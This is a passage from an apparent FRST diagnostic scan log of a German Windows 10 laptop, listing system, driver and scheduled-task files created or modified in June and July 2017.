2017-06-08 09:54 - 2017-06-08 09:54 - 00518144 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00476160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00444928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Launcher.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00439808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-06-08 09:54 - 2017-06-08 09:54 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00408064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00406064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DictationManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-06-08 09:54 - 2017-06-08 09:54 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00370928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00363424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00335808 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00287648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00211872 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\RstrtMgr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00188824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00181664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RstrtMgr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSM.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\embeddedmodesvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00144288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSaveExt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSM.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00112544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrvext.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00086016 _____ C:\WINDOWS\system32\xboxgipsynthetic.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-06-08 09:54 - 2017-06-08 09:54 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-06-08 09:54 - 2017-06-08 09:54 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\vss_ps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00059904 _____ C:\WINDOWS\SysWOW64\xboxgipsynthetic.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-06-08 09:54 - 2017-06-08 09:54 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksthunk.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\snmptrap.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rootmdm.sys
2017-06-08 09:51 - 2017-06-08 09:51 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-06-08 09:51 - 2017-06-08 08:58 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-06-08 09:48 - 2017-06-08 09:48 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\SysWOW64\BestPractices
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\system32\msmq
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\WINDOWS\system32\BestPractices
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files\MSBuild
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-06-08 09:48 - 2017-06-08 09:48 - 00000000 ____D C:\inetpub
2017-06-08 09:48 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-06-08 09:48 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-06-08 09:48 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-06-08 09:48 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-06-08 09:48 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-06-08 09:48 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-06-08 09:17 - 2017-06-08 09:17 - 00000000 ____D C:\ProgramData\USOShared
2017-06-08 09:09 - 2017-06-08 09:09 - 00011433 _____ C:\WINDOWS\diagwrn.xml
2017-06-08 09:09 - 2017-06-08 09:09 - 00011433 _____ C:\WINDOWS\diagerr.xml
2017-06-08 09:08 - 2017-07-05 21:30 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-06-08 09:08 - 2017-06-08 09:08 - 00003760 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineUA
2017-06-08 09:08 - 2017-06-08 09:08 - 00003536 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineCore
2017-06-08 09:08 - 2017-06-08 09:08 - 00003482 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2017-06-08 09:08 - 2017-06-08 09:08 - 00003404 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-06-08 09:08 - 2017-06-08 09:08 - 00003118 _____ C:\WINDOWS\System32\Tasks\Intel PTT EK Recertification
2017-06-08 09:08 - 2017-06-08 09:08 - 00002340 _____ C:\WINDOWS\System32\Tasks\{D47AB256-778C-4756-BFF4-B5F38C8A441A}
2017-06-08 09:08 - 2017-06-08 09:08 - 00002336 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_LENOVO_MICPKEY
2017-06-08 09:08 - 2017-06-08 09:08 - 00002336 _____ C:\WINDOWS\System32\Tasks\{C33EC7F1-7E6C-4635-A9D8-DE9B48C4F5F2}
2017-06-08 09:08 - 2017-06-08 09:08 - 00002306 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_Dolby
2017-06-08 09:08 - 2017-06-08 09:08 - 00002280 _____ C:\WINDOWS\System32\Tasks\RTKCPL
2017-06-08 09:08 - 2017-06-08 09:08 - 00002274 _____ C:\WINDOWS\System32\Tasks\DolbySelectorTask
2017-06-08 09:08 - 2017-06-08 09:08 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD
2017-06-08 09:08 - 2017-06-08 09:08 - 00000000 ____D C:\WINDOWS\System32\Tasks\Lenovo
2017-06-08 09:05 - 2017-06-08 09:05 - 00001519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-06-08 09:01 - 2017-06-08 09:06 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-06-08 09:01 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\Common Files\SpeechEngines
2017-06-08 09:00 - 2017-07-05 21:30 - 00000000 ____D C:\ProgramData\Synaptics
2017-06-08 09:00 - 2017-07-04 21:38 - 02417936 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-06-08 09:00 - 2017-06-30 07:49 - 00000000 ____D C:\Users\ararat
2017-06-08 09:00 - 2017-06-08 09:07 - 00000000 ____D C:\Users\DefaultAppPool
2017-06-08 09:00 - 2017-06-08 09:00 - 02011386 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Vorlagen
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Startmenü
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Netzwerkumgebung
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Lokale Einstellungen
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Eigene Dateien
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Druckumgebung
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Videos
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Musik
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Bilder
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Verlauf
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Anwendungsdaten
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Anwendungsdaten
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Vorlagen
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Startmenü
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Netzwerkumgebung
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Lokale Einstellungen
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Eigene Dateien
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Druckumgebung
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Videos
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Musik
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Bilder
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Local\Verlauf
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Local\Anwendungsdaten
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Anwendungsdaten
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WUDFUsbccidDriver_01_11_00.Wdf
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_wbf_vfs_lvcmn_01_11_00.Wdf
2017-06-08 09:00 - 2017-05-01 22:51 - 06437312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 02479552 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 01762752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00548800 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00146880 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\oemdspif.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-06-08 09:00 - 2017-04-25 23:11 - 07944687 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-06-08 08:59 - 2017-07-05 21:30 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-06-08 08:59 - 2017-07-05 21:30 - 00000000 ____D C:\ProgramData\NVIDIA
2017-06-08 08:59 - 2017-06-08 09:02 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2017-06-08 08:59 - 2017-06-08 09:02 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-06-08 08:59 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2017-06-08 08:59 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\Intel
2017-06-08 08:59 - 2017-06-08 09:00 - 00000000 ____D C:\Program Files\Synaptics
2017-06-08 08:59 - 2017-06-08 08:59 - 00044875 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
2017-06-08 08:59 - 2017-06-08 08:59 - 00000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_Smb_driver_Intel_01011.Wdf
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\WINDOWS\system32\DAX2
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\Program Files\Realtek
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 _____ C:\WINDOWS\system32\GfxValDisplayLog.bin
2017-06-08 08:59 - 2017-05-01 22:52 - 00001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-06-08 08:59 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-06-08 08:59 - 2016-11-02 00:05 - 00099848 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL
2017-06-08 08:58 - 2017-07-05 21:30 - 04916088 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-06-08 08:58 - 2017-07-05 21:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-06-05 22:24 - 2017-06-12 21:54 - 00000000 ___DC C:\WINDOWS\Panther
2017-06-05 10:50 - 2017-06-05 10:50 - 00257864 _____ (Lenovo Group Limited) C:\WINDOWS\system32\iMDriverHelper.dll
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-07-05 21:30 - 2016-02-11 22:02 - 00000000 __SHD C:\Users\ararat\IntelGraphicsProfiles
2017-07-05 21:29 - 2017-03-18 13:40 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-07-05 21:20 - 2016-02-23 19:39 - 00000000 ____D C:\Users\ararat\AppData\LocalLow\Temp
